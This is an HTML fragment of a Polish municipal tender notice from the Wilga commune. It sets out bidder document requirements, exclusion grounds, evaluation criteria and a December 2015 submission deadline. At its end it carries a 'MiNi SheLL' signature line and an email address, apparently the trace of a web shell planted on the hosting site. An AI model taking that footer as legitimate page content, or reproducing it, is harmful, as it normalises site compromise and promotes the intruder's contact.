<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). Wypełniony i podpisany druk oferty - załącznik nr 1 do SIWZ;
2). Oryginał pełnomocnictwa do reprezentowania Oferenta w postępowaniu o zamówienie publiczne lub do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - Termin płatności - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ust 1 ustawy Pzp Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w  zakresie:
- zmiany ustawowej stawki podatku VAT - jej obniżenie lub podwyższenie jest możliwe w wysokości odpowiadającej zmianie podatku;
- zaniechania wykonania części usług lub wprowadzenia usług koniecznych wynikających z uwarunkowań gminy Wilga lub zmian prawa.
-  jeżeli zajdą okoliczności, na które strony umowy nie będą miały wpływu lub wystąpienia których, nie przewidywano w chwili zawarcia niniejszej  umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.e-bip.pl Wilga Zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Wildze
ul. Warszawska 38
08-470 Wilga
pok. nr 9..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2015 godzina 10:00, miejsce: Urząd Gminy w Wildze
ul. Warszawska 38
08-470 Wilga
sekretariat pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com